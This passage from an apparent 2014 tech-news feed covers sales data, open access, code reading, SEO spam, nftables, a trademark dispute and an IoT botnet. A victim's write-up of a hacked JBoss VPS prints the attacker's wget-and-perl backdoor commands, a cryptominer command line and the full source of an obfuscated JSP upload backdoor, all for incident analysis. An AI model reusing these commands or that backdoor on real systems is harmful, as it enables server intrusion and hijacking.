Datanyze, however, says that its data keeps getting better every single day: fresher and fresher.

KISSmetrics is still a customer, as are HubSpot, the marketing automation vendor Act-On, and many other well-known companies. One in particular, a leading video platform, has found the data so high quality that it has increased its purchase from five seats late last year to “well over 100” today.

Enterprise customers can use the Datanyze API to bring data right into their systems, or use its Salesforce integration, with prices starting at $1,200 for the first seat and going down for subsequent users. Small customers can get platform access and CSV exports for $500 for the first seat, but Datanyze is also looking to offer a freemium product shortly.

While still small — the company will hit $1M in annual revenue “pretty soon” — Datanyze is growing fast.

“We’re really starting to grow,” Sardella says. “By the end of this month we will increase our total revenue by 25% just over one month.”

As the company grows, more options become available. Making the data richer, adding more categories to the 25 or more that it currently searches for, and adding more filtering are all on the table, marketing head Jon Hearty told me.

“We’re also asking ourselves how we can deliver this data in a way that is more seamless for salespeople,” he said. “We built a Chrome plugin for websites — because sales reps are constantly surfing the web for prospects — that gives you all the information in your browser … software they use, company size … and a link to dump it into Salesforce.”

Clearly, with HG Data and Salesify, among other competitors, the big data industry for sales and marketing leads is heating up.


Half of taxpayer funded research will soon be available to the public


Comments:"Half of taxpayer funded research will soon be available to the public"

URL:http://www.washingtonpost.com/blogs/the-switch/wp/2014/01/17/half-of-taxpayer-funded-research-will-soon-be-available-to-the-public/


 

Proponents of the open access model for academic research notched a huge victory Thursday night when Congress passed a budget that will make about half of taxpayer-funded research available to the public.

Deep inside the $1.1 trillion Consolidated Appropriations Act for 2014 is a provision that requires federal agencies under the Labor, Health and Human Services, and Education portion of the bill with research budgets of $100 million or more to provide the public with online access to the research that they fund within 12 months of publication in a peer-reviewed journal.

According to the Scholarly Publishing and Academic Resources Coalition (SPARC), this means approximately $31 billion of the total $60 billion annual U.S. investment in taxpayer-funded research will become openly accessible. “This is an important step toward making federally funded scientific research available for everyone to use online at no cost,” said SPARC Executive Director Heather Joseph in a news  release. The language in the appropriations bill mirrors that in the White House open access memo from last year, and a National Institutes of Health public access program enacted in 2008.

Sen. Tom Harkin (D-Iowa), who was instrumental in getting the NIH program launched, told The Post: "Expanding this policy to public health and education research is a step toward a more transparent government and better science.”

While the government funds a significant chunk of academic research in the United States, most taxpayers do not have access to the results of that research, which is often kept in pay-walled databases controlled by commercial publishers. As the Internet has made it far easier for academics to share their research results, many have pushed for a more open system that allows public sharing of scholarly research commonly called "open access." But some publishers have cracked down, even going after individual professors who post their research on their university Web pages.

In recent years, Congress has considered various legislative proposals concerning access to publicly funded research. The Fair Access to Science and Technology Research Act would have mandated that publicly funded research be freed up within six months of publication. Another, the Research Works Act, would have effectively prohibited open access mandates and rolled back the NIH's public access program.

Code is not literature


Comments:"Code is not literature"

URL:http://www.gigamonkeys.com/code-reading/


20 January 2014

I have started code reading groups at the last two companies I’ve worked at, Etsy and Twitter, and some folks have asked for my advice about code reading and running code reading groups. Tl;dr: don’t start a code reading group. What you should start instead I’ll get to in a moment but first I need to explain how I arrived at my current opinion.

As a former English major and a sometimes writer, I had always been drawn to the idea that code is like literature and that we ought to learn to write code the way we learn to write good English: by reading good examples. And I’m certainly not the only one to have taken this point of view—Donald Knuth, in addition to his work on The Art of Computer Programming and TeX, has long been a proponent of what he calls Literate Programming and has published several of his large programs as books.

On the other hand, long before I got to Etsy and started my first code reading group I had in hand several pieces of evidence that should have suggested to me that this was the wrong way to look at things.

First, when I did my book of interviews with programmers, Coders at Work, I asked pretty much everyone about code reading. And while most of them said it was important and that programmers should do it more, when I asked them about what code they had read recently, very few of them had any great answers. Some of them had done some serious code reading as young hackers but almost no one seemed to have a regular habit of reading code. Knuth, the great synthesizer of computer science, does seem to read a lot of code and Brad Fitzpatrick was able to talk about several pieces of open source code that he had read just for the heck of it. But they were the exceptions.

If that wasn’t enough, after I finished Coders I had a chance to interview Hal Abelson, the famous MIT professor and co-author of the Structure and Interpretation of Computer Programs. The first time I talked to him I asked my usual question about reading code and he gave the standard answer—that it was important and we should do it more. But he too failed to name any code he had read recently other than code he was obliged to: reviewing co-workers’ code at Google where he was on sabbatical and grading student code at MIT. Later I asked him about this disconnect:

Seibel: I’m still curious about this split between what people say and what they actually do. Everyone says, “People should read code” but few people seem to actually do it. I’d be surprised if I interviewed a novelist and asked them what the last novel they had read was, and they said, “Oh, I haven’t really read a novel since I was in grad school.” Writers actually read other writers but it doesn’t seem that programmers really do, even though we say we should.

Abelson: Yeah. You’re right. But remember, a lot of times you crud up a program to make it finally work and do all of the things that you need it to do, so there’s a lot of extraneous stuff around there that isn’t the core idea.

Seibel: So basically you’re saying that in the end, most code isn’t worth reading?

Abelson: Or it’s built from an initial plan or some kind of pseudocode. A lot of the code in books, they have some very cleaned-up version that doesn’t do all the stuff it needs to make it work.

Seibel: I’m thinking of the preface to SICP, where it says, “programs must be written for people to read and only incidentally for machines to execute.” But it seems the reality you just described is that in fact, most programs are written for machines to execute and only incidentally, if at all, for people to read.

Abelson: Well, I think they start out for people to read, because there’s some idea there. You explain stuff. That’s a little bit of what we have in the book. There are some fairly significant programs in the book, like the compiler. And that’s partly because we think the easiest way to explain what it’s doing is to express that in code.

Yet somehow even this explicit acknowledgement that most real code isn’t actually in a form that can be simply read wasn’t enough to lead me to abandon the literature seminar model when I got to Etsy. For our first meeting I picked Jeremy Ashkenas’s backbone.js because many of the Etsy developers would be familiar with Javascript and because I know Jeremy is particularly interested in writing readable code. I still envisioned something like a literature seminar but I figured that a lot of people wouldn’t actually have done the reading in advance (well, maybe not so different from a literature seminar) so I decided to start things off by presenting the code myself before the group discussion.

As I prepared my presentation, I found myself falling into my usual pattern when trying to really understand a piece of code—in order to grok it I have to essentially rewrite it. I’ll start by renaming a few things so they make more sense to me and then I’ll move things around to suit my ideas about how to organize code. Pretty soon I’ll have gotten deep into the abstractions (or lack thereof) of the code and will start making bigger changes to the structure of the code. Once I’ve completely rewritten the thing I usually understand it pretty well and can even go back to the original and understand it too. I have always felt kind of bad about this approach to code reading but it's the only thing that's ever worked for me.

My presentation to the code reading group started with stock backbone.js and then walked through the changes I would make to it to make it, by my lights, more understandable. At one point I asked if people thought we should move on to the group discussion but nobody seemed very interested. Hopefully seeing my refactoring gave people some of the same insights into the underlying structure of the original that I had obtained by doing the refactoring.

The second meeting of the Etsy code reading group featured Avi Bryant demonstrating how to use the code browsing capabilities of Smalltalk to navigate through some code. In that case, because few of the Etsy engineers had any experience with Smalltalk, we had no expectation that folks would read the code in advance. But the presentation was an awesome chance for folks to get exposed to the power of the Smalltalk development environment and for me to heckle Avi about Smalltalk vs Lisp differences.

When I got to Twitter I inexplicably still had the literature seminar model in mind even though neither of the two meetings of the Etsy reading group—which folks seemed to like pretty well—followed that model at all. When I sent out the email inviting Twitter engineers to join a code reading group the response was pretty enthusiastic. The first meeting was, yet again, a presentation of some code, in this case the internals of the Scala implementation of Future that is used throughout Twitter’s many services, presented by Marius Eriksen, who wrote most of it.

It was sometime after that presentation that I finally realized the obvious: code is not literature. We don’t read code, we decode it. We examine it. A piece of code is not literature; it is a specimen. Knuth said something that should have pointed me down this track when I asked him about his own code reading:

Knuth: But it’s really worth it for what it builds in your brain. So how do I do it? There was a machine called the Bunker Ramo 300 and somebody told me that the Fortran compiler for this machine was really amazingly fast, but nobody had any idea why it worked. I got a copy of the source-code listing for it. I didn’t have a manual for the machine, so I wasn’t even sure what the machine language was. But I took it as an interesting challenge. I could figure out BEGIN and then I would start to decode. The operation codes had some two-letter mnemonics and so I could start to figure out “This probably was a load instruction, this probably was a branch.” And I knew it was a Fortran compiler, so at some point it looked at column seven of a card, and that was where it would tell if it was a comment or not. After three hours I had figured out a little bit about the machine. Then I found these big, branching tables. So it was a puzzle and I kept just making little charts like I’m working at a security agency trying to decode a secret code. But I knew it worked and I knew it was a Fortran compiler—it wasn’t encrypted in the sense that it was intentionally obscure; it was only in code because I hadn’t gotten the manual for the machine. Eventually I was able to figure out why this compiler was so fast. Unfortunately it wasn’t because the algorithms were brilliant; it was just because they had used unstructured programming and hand optimized the code to the hilt. It was just basically the way you solve some kind of an unknown puzzle—make tables and charts and get a little more information here and make a hypothesis. In general when I’m reading a technical paper, it’s the same challenge. I’m trying to get into the author’s mind, trying to figure out what the concept is. The more you learn to read other people’s stuff, the more able you are to invent your own in the future, it seems to me.

He’s not describing reading literature; he’s describing a scientific investigation. So now I have a new model for how people should get together to gain insights from code, which I explained to the Twitter code reading group like this:

Preparing for the talk I’m going to give to the Girls who Code cohort, I started thinking about what to tell them about code reading and code they should read. And once again it struck me that for all the lip service we pay to the idea of reading code, most programmers really don’t read that much code, at least not just for the sake of reading it. As a simple proof: name me one piece of code that you’ve read and that you can be reasonably sure that most other good programmers will have read or will at least have heard of. Not many, right? Probably none.

But then it hit me. Code is not literature and we are not readers. Rather, interesting pieces of code are specimens and we are naturalists. So instead of trying to pick out a piece of code and reading it and then discussing it like a bunch of Comp Lit. grad students, I think a better model is for one of us to play the role of a 19th century naturalist returning from a trip to some exotic island to present to the local scientific society a discussion of the crazy beetles they found: “Look at the antenna on this monster! They look incredibly ungainly but the male of the species can use these to kill small frogs in whose carcass the females lay their eggs.”

The point of such a presentation is to take a piece of code that the presenter has understood deeply and for them to help the audience understand the core ideas by pointing them out amidst the layers of evolutionary detritus (a.k.a. kluges) that are also part of almost all code. One reasonable approach might be to show the real code and then to show a stripped down reimplementation of just the key bits, kind of like a biologist staining a specimen to make various features easier to discern.

The ideal presentation should be aimed at an audience of gentleman and lady programmers—smart, and generally capable but without, necessarily, any specific knowledge of the domain from which the code comes. Presentations should provide enough context for the audience to understand what the code is and should explain any details of the implementation language that may be obscure to the average programmer.

Since I had my epiphany we’ve had several meetings of the code reading group, now known as the Royal Society of Twitter for Improving Coding Knowledge, along the new lines. We’re still learning about the best ways to present code but the model feels very right. Also, I no longer feel bad about my dissection-based approach to reading code.

The biggest lesson so far is that code is very dense. A half hour presentation is just enough time to present maybe a dozen meaty lines of code and one main idea. It is also almost certainly the case that the presenters, who have to actually really dig down into a piece of code, get more out of it than anybody. But it does seem that a good presentation can at least expose people to the main ideas and maybe give them a head start if they do decide to read the code themselves.

The decay and fall of guest blogging for SEO


Comments:"The decay and fall of guest blogging for SEO"

URL:http://www.mattcutts.com/blog/guest-blogging/


Okay, I’m calling it: if you’re using guest blogging as a way to gain links in 2014, you should probably stop. Why? Because over time it’s become a more and more spammy practice, and if you’re doing a lot of guest blogging then you’re hanging out with really bad company.

Back in the day, guest blogging used to be a respectable thing, much like getting a coveted, respected author to write the introduction of your book. It’s not that way any more. Here’s an example unsolicited, spam email that I recently received:

My name is XXXXXXX XXXXXXXX and I work as a content marketer for a high end digital marketing agency in [a city halfway around the world]. I have been promoting high quality content in select niches for our clients. We are always on the lookout for professional, high class sites to further promote our clients and when I came across your blog I was very impressed with the fan following that you have established.I [sic] would love to speak to you regarding the possibility of posting some guest articles on your blog. Should you be open to the idea, we can consider making suitable contribution, befitting to high standard of services that your blog offers to larger audience. On my part, I assure you a high quality article that is-
- 100% original
- Well written
- Relevant to your audience and
- Exclusive to you
We can also explore including internal links to related articles across your site to help keep your readers engaged with other content on your blog. All I ask in return is a dofollow link or two in the article body that will be relevant to your audience and the article. We understand that you will want to approve the article, and I can assure you that we work with a team of highly talented writers, so we can guarantee that the article would be insightful and professionally written. We aim to write content that will benefit your loyal readers. We are also happy to write on any topic, you suggest for us.

If you ignore the bad spacing and read the parts that I bolded, someone sent me a spam email offering money to get links that pass PageRank. That’s a clear violation of Google’s quality guidelines. Moreover, we’ve been seeing more and more reports of “guest blogging” that are really “paying for PageRank” or worse, “we’ll insert some spammy links on your blog without you realizing it.”

Ultimately, this is why we can’t have nice things in the SEO space: a trend starts out as authentic. Then more and more people pile on until only the barest trace of legitimate behavior remains. We’ve reached the point in the downward spiral where people are hawking “guest post outsourcing” and writing articles about “how to automate guest blogging.”

So stick a fork in it: guest blogging is done; it’s just gotten too spammy. In general I wouldn’t recommend accepting a guest blog post unless you are willing to vouch for someone personally or know them well. Likewise, I wouldn’t recommend relying on guest posting, guest blogging sites, or guest blogging SEO as a linkbuilding strategy.

For historical reference, I’ll list a few videos and links to trace the decline of guest articles. Even back in 2012, I tried to draw a distinction between high-quality guest posts vs. spammier guest blogs:

Unfortunately, a lot of people didn’t seem to hear me say to steer away from low-quality guest blog posting, so I did a follow-up video to warn folks away from spammy guest articles:

In mid-2013, John Mueller gave spot on advice about nofollowing links in guest blog posts. I think by mid-2013, a ton of people saw the clear trend towards guest blogging being overused by a bunch of low-quality, spammy sites.

Then a few months ago, I took a question about how to be a guest blogger without it looking like paying for links (even the question is a clue that guest blog posting has been getting spammier and spammier). I tried to find a sliver of daylight to talk about high-quality guest blog posts, but if you read the transcript you’ll notice that I ended up spending most of the time talking about low-quality/spam guest posting and guest articles.

And then in this video that we posted last month, even the question itself predicted that Google would take stronger action and asked about “guest blogging as spam”:

So there you have it: the decay of a once-authentic way to reach people. Given how spammy it’s become, I’d expect Google’s webspam team to take a pretty dim view of guest blogging going forward.

Added: It seems like most people are getting the spirit of what I was trying to say, but I’ll add a bit more context. I’m not trying to throw the baby out with the bath water. There are still many good reasons to do some guest blogging (exposure, branding, increased reach, community, etc.). Those reasons existed way before Google and they’ll continue into the future. And there are absolutely some fantastic, high-quality guest bloggers out there. I changed the title of this post to make it more clear that I’m talking about guest blogging for search engine optimization (SEO) purposes.

I’m also not talking about multi-author blogs. High-quality multi-author blogs like Boing Boing have been around since the beginning of the web, and they can be compelling, wonderful, and useful.

I just want to highlight that a bunch of low-quality or spam sites have latched on to “guest blogging” as their link-building strategy, and we see a lot more spammy attempts to do guest blogging. Because of that, I’d recommend skepticism (or at least caution) when someone reaches out and offers you a guest blog article.

Agner`s CPU blog - Intel's "cripple AMD" function

Why you will love nftables » To Linux and beyond !


Comments:" Why you will love nftables » To Linux and beyond !"

URL:https://home.regit.org/2014/01/why-you-will-love-nftables/


Linux 3.13 is out

Linux 3.13 is out, bringing among other things the first official release of nftables. nftables is the project that aims to replace the existing {ip,ip6,arp,eb}tables framework, aka iptables. The nftables version in Linux 3.13 is not yet complete. Some important features are missing and will be introduced in the following Linux versions. It is already usable in most cases, but complete support (read: nftables at a better level than iptables) should be available in Linux 3.15.

nftables comes with a new command line tool named nft. nft is the successor of iptables and derivatives (ip6tables, arptables). And it has a completely different syntax. Yes, if you are used to iptables, that’s a shock. But there is a compatibility layer that allows you to use the iptables syntax even if filtering is done with nftables in the kernel.

There is really only a little documentation available for now. You can find my nftables quick howto, and there are some other initiatives that should be made public soon.

Some command line examples

Multiple targets on one line

Suppose you want to log and drop a packet. With iptables, you had to write two rules: one for logging and one for dropping:

iptables -A FORWARD -p tcp --dport 22 -j LOG
iptables -A FORWARD -p tcp --dport 22 -j DROP

With nft, you can combine both targets:

nft add rule filter forward tcp dport 22 log drop
Easy set creation

Suppose you want to allow packets for different ports and allow different icmpv6 types. With iptables, you need to use something like:

ip6tables -A INPUT -p tcp -m multiport --dports 23,80,443 -j ACCEPT
ip6tables -A INPUT -p icmpv6 --icmpv6-type neighbor-solicitation -j ACCEPT
ip6tables -A INPUT -p icmpv6 --icmpv6-type echo-request -j ACCEPT
ip6tables -A INPUT -p icmpv6 --icmpv6-type router-advertisement -j ACCEPT
ip6tables -A INPUT -p icmpv6 --icmpv6-type neighbor-advertisement -j ACCEPT

With nft, sets can be used on any element in a rule:

nft add rule ip6 filter tcp dport {telnet, http, https} accept
nft add rule filter input icmpv6 type { nd-neighbor-solicit, echo-request, nd-router-advert, nd-neighbor-advert } accept

It is easier to write and it is more efficient on the filtering side, as only one rule is added for each protocol.

You can also use named sets so you can make them evolve over time:

# nft -i # use interactive mode
nft> add set global ipv4_ad { type ipv4_address;}
nft> add element global ipv4_ad { 192.168.1.4, 192.168.1.5 }
nft> add rule ip global filter ip saddr @ipv4_ad drop
And later when a new bad boy is detected:
# nft -i
nft> add element global ipv4_ad { 192.168.3.4 }
Mapping

One advanced feature of nftables is mapping. It is possible to use two different types of data and to link them. For example, we can associate an interface with a dedicated rule set (stored in a chain and created beforehand). In the example, the chains are named low_sec and high_sec:

# nft -i
nft> add map filter jump_map { type ifindex => verdict; }
nft> add element filter jump_map { eth0 => jump low_sec; }
nft> add element filter jump_map { eth1 => jump high_sec; }
nft> add rule filter input meta iif vmap @jump_map

Now, let’s say you have a new dynamic interface ppp1; it is easy to set up filtering for it. Simply add it in the jump_map mapping:

nft> add element filter jump_map { ppp1 => jump low_sec; }

On administration and kernel side

More speed at update

Adding a rule with iptables gets dramatically slower as the number of rules grows, which explains why scripts making many iptables calls take a long time to complete. This is no longer the case with nftables, which uses fast, atomic operations to update rule sets.

Fewer kernel updates

With iptables, each match or target required a kernel module, so you had to recompile the kernel if you forgot something or wanted to use something new. This is no longer the case with nftables: most of the work is done in userspace, and the kernel only knows some basic instructions (filtering is implemented in a pseudo-state machine). For example, icmpv6 support was added via a simple patch to the nft tool. The same kind of modification in iptables would have required both a kernel and an iptables upgrade.

King has trademarked the word CANDY (and you're probably infringing) | Gamezebo


Comments:"King has trademarked the word CANDY (and you're probably infringing) | Gamezebo"

URL:http://www.gamezebo.com/news/2014/01/20/king-has-trademarked-word-candy-and-youre-probably-infringing


When you have an intellectual property – especially one that’s worth millions of dollars – you want to protect it. But can such protections ever go too far? That’s the question a lot of industry watchers are asking this morning, as developers far and wide whose games include the word ‘candy’ are getting emails from Apple on behalf of King, the makers of Candy Crush Saga.

In a filing with the US trademark office dated February 6, 2013, King.com Limited registered a claim to the word ‘candy’ as it pertains to video games and, strangely, clothing. On January 15, 2014, the filing was approved. And now, a mere five days later, reports are coming in from developers that they’re being asked to remove their app (or prove that their game doesn’t infringe upon the trademark).

“Lots of devs are frustrated cause it seems so ridiculous” says Benny Hsu, the maker of All Candy Casino Slots – Jewel Craze Connect: Big Blast Mania Land. Benny’s game, which shares no similarities with King’s properties aside from the word ‘candy,’ is one of a number of games that have been targeted by King.

 

 

Hsu contacted Sophie Hallstrom, King’s IP paralegal, to discuss the matter further. Rather than the simple “oops, our mistake” that Benny was hoping for, he was given a very finite response. “Your use of CANDY SLOTS in your app icon uses our CANDY trade mark exactly, for identical goods, which amounts to trade mark infringement and is likely to lead to consumer confusion and damage to our brand,” reads Hallstrom’s reply. “The addition of only the descriptive term "SLOTS" does nothing to lessen the likelihood of confusion.” 

So how does a word like ‘candy’ get trademarked? According to Martin Schwimmer, a partner at the IP legal firm Leeson Ellis (and the man behind The Trademark Blog), it’s all about how strong a connection the claimant has to that mark when it comes to a particular good or service. Think of Apple, for example. Nobody is going to expect the electronics giant to lay claim over the fruit, but if someone were to try to market an electronic device under that name, you’d better believe their lawyers would swoop in.

So the question then, is whether or not there’s a strong enough connection between the word ‘candy’ and video games as it pertains to Candy Crush Saga. According to the US Trademark Office, the answer is a bona fide yes.

Still, holding a trademark and being able to enforce it are entirely different things. Schwimmer is quick to point out the difference between suggestive marks and unique ones. “Someone can't plausibly claim that they came up with the term TEENAGE MUTANT NINJA TURTLES on their own.  An incredibly unique trademark like that is somewhat easy to protect.” But something generic – a dictionary word like candy? That can be a lot trickier.

 

Benny Hsu's All Candy Casino Slots

 

“Suggestive marks are protectable, but the problem is that third parties can claim that they thought up their mark on their own.” And in the case of something as generic as ‘candy,’ it doesn’t seem that farfetched to think that a lot of developers may have.

“As to how far King can enforce its rights, it will be a function of how strong its mark has become, and how similar the third party name is.  It would likely be able to enforce its rights against marks that are connotatively, phonetically or visually similar, for games that are conceivably competitive,” Schwimmer tells us. “King can't go after candy companies because candy companies don't use the term CANDY as a trademark – they use it to identify their product.”

If you’re a developer who has received one of these letters from King, Schwimmer’s advice is simple: call a lawyer. “A trademark lawyer can be very useful in obtaining a coexistence agreement.  Often a trademark owner will accept a settlement in which the possibility of confusion is mitigated, perhaps because the developer will not expand into areas more directly competitive with the trademark owner.”

But in an App Store littered with small indie developers, this is an option that seems out of reach for developers like Benny Hsu. “Myself and other indie developers don't have the money or resources to fight back… I plan on changing the name if that is what I must do.”

With Apple seemingly complicit in King’s claims – the letter Hsu initially received came through the iTunes legal department – one can’t help but wonder what the future of the App Store and suggestive trademarks might be.

“Last year I learned I couldn't use the word MEMORY because it was trademarked,” said Hsu. “Now I wonder what other common words will be trademarked in the App Store.”



Kids, this is story of How I Met... my VPS hacked. | Pedro Rio

$
0
0

Comments:"Kids, this is story of How I Met... my VPS hacked. | Pedro Rio"

URL:http://www.corrspt.com/blog/2014/01/18/tale-vps-hacked/


Hi everyone,

Just recently I published my technical goals for 2014, and one of them was to learn more about security. Well, it couldn't have been more appropriate: my VPS just got hacked, for the second time (I use the VPS to host a Java web application). The first time, I basically rebuilt my server and hardened security as much as I could, but it didn't work (more on what I did later). I'm not really a system administrator, nor do I have much experience on the matter, so I guess I must learn my lessons either by studying or by being stung.

My VPS was being used to mine bitcoins, I believe. If you have never heard of bitcoins, check Wikipedia.

My VPS is configured to send me an email alert when CPU usage is above 90% for more than two hours, which was what happened. I received an email at around 20:30 last night (Jan 17, 2014).

I logged in my VPS and used the top command to find that a single process was using all CPU, this was the culprit:

14915 ?        Ssl  710:07 ./logrotate -o stratum+tcp://bat.minersbest.com:10470 -u apapun.seattle -p x --threads=4 --background

Never heard of something like that, but with a bit of googling I traced it to bitcoin mining.

As I said at the beginning, this was the second time my server got hacked (using the same method, I believe), so this time I really had to figure out what went wrong, as I wasn't going to do everything from scratch again!

The first time my server was hacked I rebuilt it from scratch with the following steps to increase security:

  • Install a newer CentOS version
  • Update all packages
  • Disable root login via SSH
  • Disable password login via SSH (only private keys; see the sshd_config sketch after this list)
  • Setup firewall to block all traffic except port 80 (HTTP), 443 (HTTPS) and 22 (SSH)
  • Install Fail2Ban
  • Change the user and root password to even more secure passwords (more than 15 chars each)
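
For reference, the two SSH items above boil down to a handful of sshd_config directives; a minimal sketch (assuming OpenSSH as shipped with CentOS; check your own /etc/ssh/sshd_config before restarting sshd):

# /etc/ssh/sshd_config (relevant directives only)
PermitRootLogin no                  # no direct root logins
PasswordAuthentication no           # keys only
ChallengeResponseAuthentication no
PubkeyAuthentication yes
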

I thought I had it covered…

I tried checking the SSH log at /var/log/secure and found that lots of attempts were made to log in with different users (with common names like admin, oracle, weblogic, postgres, etc.), but none seemed to have succeeded, as I had set up private-key-only login.

Could it be that someone found a vulnerability in my web application? Oh boy…
I have a setup where Jboss hosts the web application and Apache proxies and handles the SSL stuff.

I went on and checked the Apache access logs (in /var/log/httpd/access_log) around the time the CPU first went off and found something interesting

114.79.12.168 - - [17/Jan/2014:18:15:26 +0000] "GET /a/pwn.jsp?cmd=cat%20/proc/cpuinfo HTTP/1.1" 200 540 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.76 Safari/537.36"

A GET request to /a/pwn.jsp with the parameter cat /proc/cpuinfo… as if this JSP were some kind of web shell… and it got a 200 OK response? No way…
Back to the browser to check, and sure enough, the server responded with an empty page… Next check: I tried /a/pwn.jsp?cmd=ls and ouch… the directory listing appeared.

Ok, so let’s check the full log using the following command (trimmed for readability)

cat /var/log/httpd/access_log | grep 'pwn.jsp'
[17/Jan/2014:18:15:26 +0000] "GET /a/pwn.jsp?cmd=cat%20/proc/cpuinfo
[17/Jan/2014:18:15:36 +0000] "GET /a/pwn.jsp?cmd=ps%20x
[17/Jan/2014:18:15:41 +0000] "GET /a/pwn.jsp?cmd=ls%20-al
[17/Jan/2014:18:15:52 +0000] "GET /a/pwn.jsp?cmd=wget%20pdd-nos.info/.tmp/back.conn.txt%20-O%20bd
[17/Jan/2014:18:16:05 +0000] "GET /a/pwn.jsp?cmd=perl%20bd%20pdd-nos.info%2011457
[17/Jan/2014:18:17:44 +0000] "GET /a/pwn.jsp?cmd=ps%20x
[17/Jan/2014:18:18:23 +0000] "GET /a/pwn.jsp?cmd=ps%20x
[17/Jan/2014:18:27:57 +0000] "GET /a/pwn.jsp?cmd=ps%20x

With a little cleaning and url decode, you get the following list of commands:

1) cat /proc/cpuinfo
2) ps x
3) ls -al
4) wget pdd-nos.info/.tmp/back.conn.txt -O bd
5) perl bd pdd-nos.info 11457
6) ps x
7) kill 14873
8) ps x
9) ps x
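
One way to do that cleaning and decoding in one pass (a sketch of mine, not from the original post; it assumes Python 2 as shipped with CentOS):

grep 'pwn.jsp' /var/log/httpd/access_log \
  | sed 's/.*cmd=\([^ "]*\).*/\1/' \
  | python -c 'import sys, urllib
for line in sys.stdin:
    print urllib.unquote(line.strip())'
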

Interestingly, the web shell appears to be just a means to an end: the wget in step 4 downloaded something that was then run in step 5 by the Perl interpreter. I checked the pdd-nos.info link and found what appears to be some kind of backdoor shell, and I assume this was what was used to launch the bitcoin mining process.

 

Ok, so I have a problem, a big one. And I need to do two things: figure out how the attacker got in, and clean up everything that was left behind.

I started by searching how someone installed a web shell in my Jboss instance. With a bit of googling I found the following resources (the “pwn.jsp” filename was a really big help there)

Those resources in turn led me to find that an existing vulnerability in JBoss's HTTP Invoker was probably used, which basically means an attacker could trigger remote code execution. Not nice!

With additional searching I found an exploit ready to be used: a PHP script that downloads a .war application containing the web shell and uses the known vulnerability in the HTTP Invoker to deploy the .war.

But wait a minute, where was that logrotate process that was consuming my CPU (cleverly named so that I wouldn't notice)? If there's a process, then there's an executable somewhere. I found it right inside my /JBOSS_HOME/bin folder, along with a file named jboss4.txt (also named so that I wouldn't find it suspicious), whose content was:

print "Executed"; system("nohup ./logrotate -o stratum+tcp://bat.minersbest.com:10470 -u apapun.seattle -p x --threads=4 &> logrotate.log");

Now, the issue is… was there something else that could have been changed so that even if I restarted JBoss it would allow the attacker to execute the same attack again? Hunt time!

Indeed, I found that in /JBOSS_HOME/server/INSTANCE/server/deploy/management there was a little folder called "lMvcdFxMFrvdib.war" (I kid you not), and inside the folder a file named "ZqxQljMExRpriU.jsp" (again, I kid you not)… the content of the JSP was:

<%@page import="java.io.*, java.util.*, sun.misc.BASE64Decoder" %><%
String PJdpj = "";
String pIGx = "";
String RSVw = System.getProperty("jboss.server.home.dir");
if (request.getParameter("pUBYyDsT") != null) {
    // upload branch: a base64-encoded parameter is decoded and written out
    // as a new .war (named by another parameter) in JBoss's deploy directory
    try {
        PJdpj = request.getParameter("pUBYyDsT");
        pIGx = request.getParameter("oAEICWIo");
        byte[] rFPE = new BASE64Decoder().decodeBuffer(PJdpj);
        String MfNJU = RSVw + "/deploy/" + pIGx + ".war";
        FileOutputStream twkH = new FileOutputStream(MfNJU);
        twkH.write(rFPE);
        twkH.close();
    } catch (Exception e) {}
} else {
    // cleanup branch: delete a previously deployed .war by name
    try {
        String VBpM = request.getParameter("oAEICWIo");
        String dhkDS = RSVw + "/deploy/" + VBpM + ".war";
        new File(dhkDS).delete();
    } catch (Exception e) {}
}
%>

Although the variable names are obfuscated, you can tell that it receives some content encoded as Base64 and then writes that content to a .war file inside JBoss's deploy directory. Clever trick… if I were to remove the attacker's original war (the one with pwn.jsp) and restart JBoss, this .war file would also be deployed and provide a clear path of attack again!

So I had to secure the HTTP Invoker, and that was the problem: I had the HTTP Invoker and Web Console deployed and accessible to anyone (big, big mistake). Since I don't need them, I simply removed them, simple enough. Next, to delete the files!

I had to delete the files in JBOSS_HOME/bin which were used to create the shell and mine the bitcoins; I had to delete the pwn.jsp that was installed in my JBoss instance; and I had to delete the war with the crazy name, to stop an attacker from deploying another war without my knowledge.
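
While doing that cleanup, it can also help to sweep the JBoss tree for anything else modified recently; a quick sketch (the three-day window is arbitrary):

find /JBOSS_HOME -type f -mtime -3 -ls
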

The conclusion is that you can never be too careful with security. Anyone from around the world can try to frak you, and you must be very careful. I overlooked the deployment of the Web Console and HTTP Invoker, and I paid for that. Things could have been worse: if the attacker had found a way to upgrade the privileges of the user running JBoss (it's a sudoer, but the password is really hard), he could have done a lot more damage. I hope I've removed the threat, but I can't be 100% sure, so I'll have to keep monitoring. Still, I've learned my lesson.

I found a detailed guide explaining the exploit and how it works, in case you want additional information.

Happy coding and be safe!

Additional resources

 

 

Cyber attack that sent 750k malicious emails traced to hacked refrigerator, TVs and home routersSecurity IT

$
0
0

Comments:"Cyber attack that sent 750k malicious emails traced to hacked refrigerator, TVs and home routersSecurity IT"

URL:http://www.theage.com.au/it-pro/security-it/cyber-attack-that-sent-750k-malicious-emails-traced-to-hacked-refrigerator-tvs-and-home-routers-20140120-hv96q.html


At least one refrigerator was used to create a botnet that sent spam. Photo: AFP

Call it the attack of the zombie refrigerators.

Computer security researchers say they have discovered a large "botnet" which infected internet-connected home appliances and then delivered more than 750,000 malicious emails.

The California security firm Proofpoint, which announced its findings, said this may be the first proven "internet of things" based cyber attack involving "smart" appliances.

Proofpoint said hackers managed to penetrate home-networking routers, connected multimedia centres, televisions and at least one refrigerator to create a botnet — or platform to deliver malicious spam or phishing emails from a device, usually without the owner's knowledge.

Security experts previously spoke of such attacks as theoretical.

But Proofpoint said the case "has significant security implications for device owners and enterprise targets" because of massive growth expected in the use of smart and connected devices, from clothing to appliances.

"Proofpoint's findings reveal that cyber criminals have begun to commandeer home routers, smart appliances and other components of the internet of things and transform them into 'thingbots'", to carry out the same kinds of attacks normally associated with personal computers.

The security firm said these appliances may become attractive targets for hackers because they often have less security than PCs or tablets.

Proofpoint said it documented the incidents between December 23 and January 6, which featured "waves of malicious email, typically sent in bursts of 100,000, three times per day, targeting enterprises and individuals worldwide".

More than 25 per cent of the volume was sent by things that were not conventional laptops, desktop computers or mobile devices. No more than 10 emails were initiated from any single device, making the attack difficult to block based on location.

"Botnets are already a major security concern and the emergence of thingbots may make the situation much worse," said David Knight at Proofpoint.

"Many of these devices are poorly protected at best and consumers have virtually no way to detect or fix infections when they do occur. Enterprises may find distributed attacks increasing as more and more of these devices come online and attackers find additional ways to exploit them."

AFP

Stealth marketing: Microsoft paying YouTubers for Xbox One mentions | Ars Technica

$
0
0

